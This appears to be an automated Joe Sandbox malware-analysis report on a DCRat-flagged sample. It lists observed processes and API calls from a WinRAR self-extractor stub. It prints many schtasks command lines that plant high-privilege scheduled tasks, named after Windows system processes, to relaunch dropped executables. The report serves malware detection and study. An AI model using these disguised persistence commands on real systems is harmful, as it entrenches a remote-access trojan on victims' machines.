MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	19:27:09
Start date:	10/10/2024
Path:	C:\Recovery\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe
Wow64 process (32bit):	false
Commandline:	C:\Recovery\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe
Imagebase:	0x670000
File size:	2'295'296 bytes
MD5 hash:	28DD5F145AEB9F6E3D1C60BC1DE330B6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000016.00000002.2270348613.0000000002B11000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 82%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	19:27:09
Start date:	10/10/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "ShellExperienceHost" /sc ONLOGON /tr "'C:\Recovery\ShellExperienceHost.exe'" /rl HIGHEST /f
Imagebase:	0x7ff698eb0000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	19:27:09
Start date:	10/10/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "ShellExperienceHostS" /sc MINUTE /mo 13 /tr "'C:\Recovery\ShellExperienceHost.exe'" /rl HIGHEST /f
Imagebase:	0x7ff698eb0000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	19:27:10
Start date:	10/10/2024
Path:	C:\Recovery\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe
Wow64 process (32bit):	false
Commandline:	C:\Recovery\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe
Imagebase:	0x2f0000
File size:	2'295'296 bytes
MD5 hash:	28DD5F145AEB9F6E3D1C60BC1DE330B6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000019.00000002.2269260398.0000000002701000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	26
Start time:	19:27:10
Start date:	10/10/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "WHqeodkmYpJedFVKZpNEincEtJvAcDW" /sc MINUTE /mo 6 /tr "'C:\Windows\Downloaded Program Files\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe'" /f
Imagebase:	0x7ff698eb0000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	27
Start time:	19:27:10
Start date:	10/10/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "WHqeodkmYpJedFVKZpNEincEtJvAcD" /sc ONLOGON /tr "'C:\Windows\Downloaded Program Files\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe'" /rl HIGHEST /f
Imagebase:	0x7ff698eb0000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	29
Start time:	19:27:10
Start date:	10/10/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "WHqeodkmYpJedFVKZpNEincEtJvAcDW" /sc MINUTE /mo 11 /tr "'C:\Windows\Downloaded Program Files\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe'" /rl HIGHEST /f
Imagebase:	0x7ff698eb0000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	30
Start time:	19:27:10
Start date:	10/10/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "WHqeodkmYpJedFVKZpNEincEtJvAcDW" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\windows portable devices\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe'" /f
Imagebase:	0x7ff698eb0000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	31
Start time:	19:27:10
Start date:	10/10/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "WHqeodkmYpJedFVKZpNEincEtJvAcD" /sc ONLOGON /tr "'C:\Program Files (x86)\windows portable devices\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe'" /rl HIGHEST /f
Imagebase:	0x7ff698eb0000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	32
Start time:	19:27:10
Start date:	10/10/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "WHqeodkmYpJedFVKZpNEincEtJvAcDW" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\windows portable devices\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe'" /rl HIGHEST /f
Imagebase:	0x7ff698eb0000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	33
Start time:	19:27:10
Start date:	10/10/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 14 /tr "'C:\Users\Default User\Documents\WmiPrvSE.exe'" /f
Imagebase:	0x7ff698eb0000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	34
Start time:	19:27:10
Start date:	10/10/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Users\Default User\Documents\WmiPrvSE.exe'" /rl HIGHEST /f
Imagebase:	0x7ff698eb0000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	35
Start time:	19:27:10
Start date:	10/10/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 12 /tr "'C:\Users\Default User\Documents\WmiPrvSE.exe'" /rl HIGHEST /f
Imagebase:	0x7ff698eb0000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	36
Start time:	19:27:10
Start date:	10/10/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 5 /tr "'C:\Recovery\RuntimeBroker.exe'" /f
Imagebase:	0x7ff698eb0000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	37
Start time:	19:27:10
Start date:	10/10/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Recovery\RuntimeBroker.exe'" /rl HIGHEST /f
Imagebase:	0x7ff698eb0000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	38
Start time:	19:27:11
Start date:	10/10/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 14 /tr "'C:\Recovery\RuntimeBroker.exe'" /rl HIGHEST /f
Imagebase:	0x7ff698eb0000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	39
Start time:	19:27:11
Start date:	10/10/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "WHqeodkmYpJedFVKZpNEincEtJvAcDW" /sc MINUTE /mo 9 /tr "'C:\Windows\Logs\SettingSync\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe'" /f
Imagebase:	0x7ff698eb0000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	40
Start time:	19:27:11
Start date:	10/10/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "WHqeodkmYpJedFVKZpNEincEtJvAcD" /sc ONLOGON /tr "'C:\Windows\Logs\SettingSync\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe'" /rl HIGHEST /f
Imagebase:	0x7ff698eb0000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	41
Start time:	19:27:11
Start date:	10/10/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "WHqeodkmYpJedFVKZpNEincEtJvAcDW" /sc MINUTE /mo 13 /tr "'C:\Windows\Logs\SettingSync\WHqeodkmYpJedFVKZpNEincEtJvAcD.exe'" /rl HIGHEST /f
Imagebase:	0x7ff698eb0000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	9.9%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	9.3%
Total number of Nodes:	1524
Total number of Limit Nodes:	44

Executed Functions

Function 0081D5D4 Relevance: 40.4, APIs: 17, Strings: 6, Instructions: 197
filesleeptimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 008100CF: GetModuleHandleW.KERNEL32(kernel32), ref: 008100E4
Part of subcall function 008100CF: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 008100F6
Part of subcall function 008100CF: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00810127

Part of subcall function 00819DA4: GetCurrentDirectoryW.KERNEL32(?,?), ref: 00819DAC

Part of subcall function 0081A335: OleInitialize.OLE32(00000000), ref: 0081A34E
Part of subcall function 0081A335: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 0081A385
Part of subcall function 0081A335: SHGetMalloc.SHELL32(00848430), ref: 0081A38F

Part of subcall function 008113B3: GetCPInfo.KERNEL32(00000000,?), ref: 008113C4
Part of subcall function 008113B3: IsDBCSLeadByte.KERNEL32(00000000), ref: 008113D8

GetCommandLineW.KERNEL32 ref: 0081D61C
OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 0081D643
MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007104), ref: 0081D654
UnmapViewOfFile.KERNEL32(00000000), ref: 0081D68E

Part of subcall function 0081D287: SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 0081D29D
Part of subcall function 0081D287: SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 0081D2D9

CloseHandle.KERNEL32(00000000), ref: 0081D697
GetModuleFileNameW.KERNEL32(00000000,0085DC90,00000800), ref: 0081D6B2
SetEnvironmentVariableW.KERNEL32(sfxname,0085DC90), ref: 0081D6BE
GetLocalTime.KERNEL32(?), ref: 0081D6C9
_swprintf.LIBCMT ref: 0081D708
SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 0081D71A
GetModuleHandleW.KERNEL32(00000000), ref: 0081D721
LoadIconW.USER32(00000000,00000064), ref: 0081D738
DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_0001AEE0,00000000), ref: 0081D789
Sleep.KERNEL32(?), ref: 0081D7B7
DeleteObject.GDI32 ref: 0081D7F0
DeleteObject.GDI32(?), ref: 0081D800
CloseHandle.KERNEL32 ref: 0081D843

Strings

%4d-%02d-%02d-%02d-%02d-%02d-%03d, xrefs: 0081D6F9
winrarsfxmappingfile.tmp, xrefs: 0081D637
C:\Users\user\Desktop, xrefs: 0081D5E9
sfxstime, xrefs: 0081D715
STARTDLG, xrefs: 0081D77E
sfxname, xrefs: 0081D6B9

Memory Dump Source

Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd

Similarity

API ID: EnvironmentFileHandleVariable$Module$AddressCloseDeleteObjectProcView$ByteCommandCurrentDialogDirectoryGdiplusIconInfoInitializeLeadLineLoadLocalMallocMappingNameOpenParamSleepStartupTimeUnmap_swprintf
String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$C:\Users\user\Desktop$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp
API String ID: 788466649-2656992072
Opcode ID: 6fdd022faeb268873f1c9d6884dcc00f488cecb77692ce898ec52693d7b6f40b
Instruction ID: d477dbfaf10f28bcd46af0ac718bb6206962540685694772cc4beda28b4198ba
Opcode Fuzzy Hash: 6fdd022faeb268873f1c9d6884dcc00f488cecb77692ce898ec52693d7b6f40b
Instruction Fuzzy Hash: 1A61A271904341EFD320ABA9EC49FAB77ACFF45755F000829F945D2291DB78D988CBA2

Function 00819E1C Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 100
memorywindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindResourceW.KERNEL32(0081AE4D,PNG,?,?,?,0081AE4D,00000066), ref: 00819E2E
SizeofResource.KERNEL32(00000000,00000000,?,?,?,0081AE4D,00000066), ref: 00819E46
LoadResource.KERNEL32(00000000,?,?,?,0081AE4D,00000066), ref: 00819E59
LockResource.KERNEL32(00000000,?,?,?,0081AE4D,00000066), ref: 00819E64
GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,0081AE4D,00000066), ref: 00819E82
GlobalLock.KERNEL32(00000000), ref: 00819E93
CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 00819EB7
GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 00819EFC
GlobalUnlock.KERNEL32(00000000), ref: 00819F1B
GlobalFree.KERNEL32(00000000), ref: 00819F22

Strings

PNG, xrefs: 00819E1F

Memory Dump Source

Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd

Similarity

API ID: Global$Resource$CreateLock$AllocBitmapFindFreeFromGdipLoadSizeofStreamUnlock
String ID: PNG
API String ID: 3656887471-364855578
Opcode ID: 4ab844087d3361ba7aca384bddbee5864f74c1ec21a81443c3c158a2ee04fa74
Instruction ID: 4fdfcdb7707383371c31574b1d11698090cc6534cb98af629b7e2e5d2f6dde3a
Opcode Fuzzy Hash: 4ab844087d3361ba7aca384bddbee5864f74c1ec21a81443c3c158a2ee04fa74
Instruction Fuzzy Hash: 1931A275204706AFC7109F21EC5896BBFADFF89751B040928F946D2260EF75DC41CBA1

Function 0080A5F4 Relevance: 7.6, APIs: 5, Instructions: 107
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindFirstFileW.KERNELBASE(?,?,?,?,?,?,0080A4EF,000000FF,?,?), ref: 0080A628
FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,0080A4EF,000000FF,?,?), ref: 0080A65E
GetLastError.KERNEL32(?,?,00000800,?,?,?,?,0080A4EF,000000FF,?,?), ref: 0080A66A
FindNextFileW.KERNEL32(?,?,?,?,?,?,0080A4EF,000000FF,?,?), ref: 0080A692
GetLastError.KERNEL32(?,?,?,?,0080A4EF,000000FF,?,?), ref: 0080A69E

Memory Dump Source

Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd

Similarity

API ID: FileFind$ErrorFirstLast$Next
String ID:
API String ID: 869497890-0
Opcode ID: 6539709e5729f5caef4c9c17c3a25aceeeab69f6772d617cc94eabc8538fd254
Instruction ID: 102fdc59265cedc63d5e522e0c72fd68952f2642d2e2dfa2a3974b32236ece27
Opcode Fuzzy Hash: 6539709e5729f5caef4c9c17c3a25aceeeab69f6772d617cc94eabc8538fd254
Instruction Fuzzy Hash: 96416F72504745AFC364EF68CC84ADAF7F8FF98340F040A29F5A9D3250D775A9948B92

Function 0082753D Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000000,?,00827513,00000000,0083BAD8,0000000C,0082766A,00000000,00000002,00000000), ref: 0082755E
TerminateProcess.KERNEL32(00000000,?,00827513,00000000,0083BAD8,0000000C,0082766A,00000000,00000002,00000000), ref: 00827565
ExitProcess.KERNEL32 ref: 00827577

Memory Dump Source

Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 071504ae7d7ea8e3120d1fcff75942e6c9a32dd36819cfe6cd9fab5afd01c09c
Instruction ID: ce1745529b4b188ea6fd680f11c2f0cc8db6ffea6387b110e2a3b56bcdd15540
Opcode Fuzzy Hash: 071504ae7d7ea8e3120d1fcff75942e6c9a32dd36819cfe6cd9fab5afd01c09c
Instruction Fuzzy Hash: FCE0EC31004958AFCF15AF69EE19A497F69FF84741F108824F905CA232CB35DE82CB51

Function 0080857B Relevance: 3.9, APIs: 2, Instructions: 947COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00808580
_memcmp.LIBVCRUNTIME ref: 00808A08

Memory Dump Source

Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd

Similarity

API ID: H_prolog_memcmp
String ID:
API String ID: 3004599000-0
Opcode ID: c3a285d907d5467c2c31477d821730ae5d8c9621eaf248447d7a91c27087eb6c
Instruction ID: adba5ea1b8d059430c0a216c8ea33859b4769294939c22fbb3304947a0ca5e5a
Opcode Fuzzy Hash: c3a285d907d5467c2c31477d821730ae5d8c9621eaf248447d7a91c27087eb6c
Instruction Fuzzy Hash: F0820430904245EEDF65DB64CC85AFABBA9FF15300F0841B9E8D9DB1C3DB215A88CB61

Function 0081AEE0 Relevance: 98.7, APIs: 47, Strings: 9, Instructions: 724COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0081AEE5

Part of subcall function 0080130B: GetDlgItem.USER32(00000000,00003021), ref: 0080134F
Part of subcall function 0080130B: SetWindowTextW.USER32(00000000,008335B4), ref: 00801365

Strings

"%s"%s, xrefs: 0081B423
winrarsfxmappingfile.tmp, xrefs: 0081B2BC
C:\Users\user\Desktop, xrefs: 0081B2DF
__tmp_rar_sfx_access_check_%u, xrefs: 0081B1CB
@, xrefs: 0081B2A7
<, xrefs: 0081B29A
STARTDLG, xrefs: 0081AF04
LICENSEDLG, xrefs: 0081B771
-el -s2 "-d%s" "-sp%s", xrefs: 0081B281

Memory Dump Source

Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd

Similarity

API ID: H_prologItemTextWindow
String ID: "%s"%s$-el -s2 "-d%s" "-sp%s"$<$@$C:\Users\user\Desktop$LICENSEDLG$STARTDLG$__tmp_rar_sfx_access_check_%u$winrarsfxmappingfile.tmp
API String ID: 810644672-3472986185
Opcode ID: 5d6d9eae344b42e8669a34d06704391834445438eb298d17653ad0febf79abcb
Instruction ID: 38f4f22625a8cd5ce215e756245a8d69087764dc4b4ce75cb40fabb60f192894
Opcode Fuzzy Hash: 5d6d9eae344b42e8669a34d06704391834445438eb298d17653ad0febf79abcb
Instruction Fuzzy Hash: 6242C1B0944644BEEB25ABA4DC8AFEE7B7CFF02705F000095F645E61D1CBB85984CB66

Function 008100CF Relevance: 51.1, APIs: 22, Strings: 7, Instructions: 317
libraryfileloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(kernel32), ref: 008100E4
GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 008100F6
GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00810127
GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 008103D4
CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 008103F0
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00810402
ReadFile.KERNEL32(00000000,?,00007FFE,00833BA4,00000000), ref: 00810421
CloseHandle.KERNEL32(00000000), ref: 00810479
GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 0081048F
CompareStringW.KERNEL32(00000400,00001001,?,?,DXGIDebug.dll,?,?,00000000,?,00000800), ref: 008104E7
GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,00000000,?,00000800), ref: 00810510
GetFileAttributesW.KERNEL32(?,?,?,00000800), ref: 0081054A

Part of subcall function 00810085: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 008100A0
Part of subcall function 00810085: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0080EB86,Crypt32.dll,00000000,0080EC0A,?,?,0080EBEC,?,?,?), ref: 008100C2

_swprintf.LIBCMT ref: 008105BE
_swprintf.LIBCMT ref: 0081060A

Part of subcall function 0080400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 0080401D

AllocConsole.KERNEL32 ref: 00810612
GetCurrentProcessId.KERNEL32 ref: 0081061C
AttachConsole.KERNEL32(00000000), ref: 00810623
GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 00810649
WriteConsoleW.KERNEL32(00000000), ref: 00810650
Sleep.KERNEL32(00002710), ref: 0081065B
FreeConsole.KERNEL32 ref: 00810661
ExitProcess.KERNEL32 ref: 00810669

Strings

kernel32, xrefs: 008100DD
Please remove %s from %s folder. It is unsecure to run %s until it is done., xrefs: 008105F8
SetDefaultDllDirectories, xrefs: 00810121
dwmapi.dll, xrefs: 00810194, 00810581
DXGIDebug.dll, xrefs: 00810169, 008104D3
SetDllDirectoryW, xrefs: 008100F0
uxtheme.dll, xrefs: 0081058B

Memory Dump Source

Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd

Similarity

API ID: File$Console$HandleModule$AddressAttributesNameProcProcess_swprintf$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadPointerReadSleepStringSystemWrite__vswprintf_c_l
String ID: DXGIDebug.dll$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$dwmapi.dll$kernel32$uxtheme.dll
API String ID: 1201351596-3298887752
Opcode ID: 558f6a0136b06af741eb061037b654fa37e60fa5f1a98cd19b6fb849b07cbecb
Instruction ID: 13934c182909d1c32e29b78f378751a7fe20bd7e6d175ba17fb1976baa3326e8
